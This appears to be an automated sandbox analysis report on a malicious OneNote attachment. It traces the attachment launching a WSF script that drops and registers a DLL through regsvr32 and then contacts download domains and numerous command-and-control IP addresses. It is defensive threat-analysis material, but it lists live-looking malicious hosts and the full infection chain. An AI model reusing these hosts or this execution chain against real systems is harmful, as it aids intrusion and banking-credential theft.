wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gomespontes.com.br/logs/pd/
Source: wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gomespontes.com.br/logs/pd/RPROFII
Source: wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gomespontes.com.br/logs/pd/RPROFIN
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
Source: unknown HTTP traffic detected: POST /jesecsgigcdk/zfgrij/wjhswvhm/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56
Source: unknown DNS traffic detected: queries for: penshorn.org
Source: global traffic HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
Source: unknown HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49685 version: TLS 1.2
Source: unknown HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.4:49689 version: TLS 1.2

E-Banking Fraud

Source: Yara match File source: 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 4.2.regsvr32.exe.2470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.2470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.633268738.00000000024A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.633113023.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.394237603.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\CRCPqQPgWxqcgJu\ Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180006818 3_2_0000000180006818
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000B878 3_2_000000018000B878
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180007110 3_2_0000000180007110
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180008D28 3_2_0000000180008D28
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180014555 3_2_0000000180014555
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_006F0000 3_2_006F0000
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073CC14 3_2_0073CC14
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074A000 3_2_0074A000
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074709C 3_2_0074709C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00737D6C 3_2_00737D6C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073263C 3_2_0073263C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00738BC8 3_2_00738BC8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00748FC8 3_2_00748FC8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00746C70 3_2_00746C70
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073D474 3_2_0073D474
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00732C78 3_2_00732C78
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073C078 3_2_0073C078
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073B07C 3_2_0073B07C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074B460 3_2_0074B460
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00755450 3_2_00755450
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074C058 3_2_0074C058
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00737840 3_2_00737840
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074C44C 3_2_0074C44C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00741030 3_2_00741030
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074EC30 3_2_0074EC30
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073B83C 3_2_0073B83C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0075181C 3_2_0075181C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00731000 3_2_00731000
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00739408 3_2_00739408
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00737C08 3_2_00737C08
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00733CF4 3_2_00733CF4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007390F8 3_2_007390F8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007348FC 3_2_007348FC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007420E0 3_2_007420E0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00743CD4 3_2_00743CD4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007314D4 3_2_007314D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007318DC 3_2_007318DC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00745CC4 3_2_00745CC4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073F8C4 3_2_0073F8C4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007408CC 3_2_007408CC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007380CC 3_2_007380CC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074A8B0 3_2_0074A8B0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007594BC 3_2_007594BC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073DCB8 3_2_0073DCB8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007398AC 3_2_007398AC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073AC94 3_2_0073AC94
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074CC84 3_2_0074CC84
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00745880 3_2_00745880
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00734C84 3_2_00734C84
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00737530 3_2_00737530
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074B130 3_2_0074B130
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00736138 3_2_00736138
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00741924 3_2_00741924
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00744D20 3_2_00744D20
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074AD28 3_2_0074AD28
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00759910 3_2_00759910
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00747518 3_2_00747518
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00758500 3_2_00758500
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074610C 3_2_0074610C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074D5F0 3_2_0074D5F0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007415C8 3_2_007415C8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory, 3_2_0000000180010C10
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert, 3_2_0000000180010AC0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject, 3_2_0000000180010DB0
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
Source: Insight_Medical_Publishing.one ReversingLabs: Detection: 30%
Source: Insight_Medical_Publishing.one Virustotal: Detection: 40%
Source: C:\Windows\SysWOW64\wscript.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing.one
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\CRCPqQPgWxqcgJu\zBLf.dll"
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE File created: C:\Users\user\Documents\{F00B6BB3-41EE-4892-B100-C863D7550BEA}
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE File created: C:\Users\user\AppData\Local\Temp\{2EB17D8E-6B60-400B-AE6E-E660500E7C76} - OProcSessId.dat
Source: classification engine Classification label: mal100.troj.expl.evad.winONE@9/11@1/49
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE File read: C:\Program Files (x86)\desktop.ini
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00738BC8 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification, 3_2_00738BC8
Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: Binary string: ain.pdb source: OneNote15WatsonLog.etl.0.dr
Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdb source: OneNote15WatsonLog.etl.0.dr
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180005C69 push rdi; ret 3_2_0000000180005C72
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800056DD push rdi; ret 3_2_00000001800056E4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073A0FC push ebp; iretd 3_2_0073A0FD
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007480D7 push ebp; retf 3_2_007480D8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00736CDE push esi; iretd 3_2_00736CDF
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00736C9F pushad ; ret 3_2_00736CAA
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00739D51 push ebp; retf 3_2_00739D5A
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00748157 push ebp; retf 3_2_00748158
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00747D4E push ebp; iretd 3_2_00747D4F
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00747D3C push ebp; retf 3_2_00747D3D
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00747D25 push 4D8BFFFFh; retf 3_2_00747D2A
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073A1D2 push ebp; iretd 3_2_0073A1D3
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00747987 push ebp; iretd 3_2_0074798F
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073A26E push ebp; ret 3_2_0073A26F
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00747EAF push 458BCC5Ah; retf 3_2_00747EBC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00739E8B push eax; retf 3_2_00739E8E
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074C731 push esi; iretd 3_2_0074C732
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024BC731 push esi; iretd 4_2_024BC732
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A6CDE push esi; iretd 4_2_024A6CDF
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024A6C9F pushad ; ret 4_2_024A6CAA
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_024C6D34 push edi; ret 4_2_024C6D36
Source: rad0767A.tmp.dll.1.dr Static PE information: section name: _RDATA
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll
Source: C:\Windows\SysWOW64\wscript.exe File created: C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\CRCPqQPgWxqcgJu\zBLf.dll (copy)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\CRCPqQPgWxqcgJu\zBLf.dll:Zone.Identifier read attributes | delete
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe TID: 6104 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 6108 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 4916 Thread sleep time: -270000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe API coverage: 8.0 %
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180008D28 FindFirstFileExW, 3_2_0000000180008D28
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406123541.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405806973.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406246546.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410685138.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407893232.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632896008.0000000000C41000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632896008.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh9
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0000000180001C48
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000A878 GetProcessHeap, 3_2_000000018000A878
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory, 3_2_0000000180010C10
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00000001800082EC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00000001800017DC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe Network Connect: 164.90.222.65 443
Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 203.26.41.131 443
Source: C:\Windows\SysWOW64\wscript.exe Domain query: penshorn.org
Source: C:\Windows\System32\regsvr32.exe Network Connect: 66.228.32.31 7080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 187.63.160.88 80
Source: C:\Windows\System32\regsvr32.exe Network Connect: 104.168.155.143 8080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 91.121.146.47 8080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 160.16.142.56 8080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 182.162.143.56 443
Source: C:\Windows\System32\regsvr32.exe Network Connect: 167.172.199.165 8080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 163.44.196.120 8080
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800070A0 cpuid 3_2_00000001800070A0
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_0000000180001D98

Stealing of Sensitive Information

Source: Yara match File source: Insight_Medical_Publishing.one, type: SAMPLE
Source: Yara match File source: 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 4.2.regsvr32.exe.2470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.2470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.633268738.00000000024A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.633113023.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.394237603.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: Insight_Medical_Publishing.one, type: SAMPLE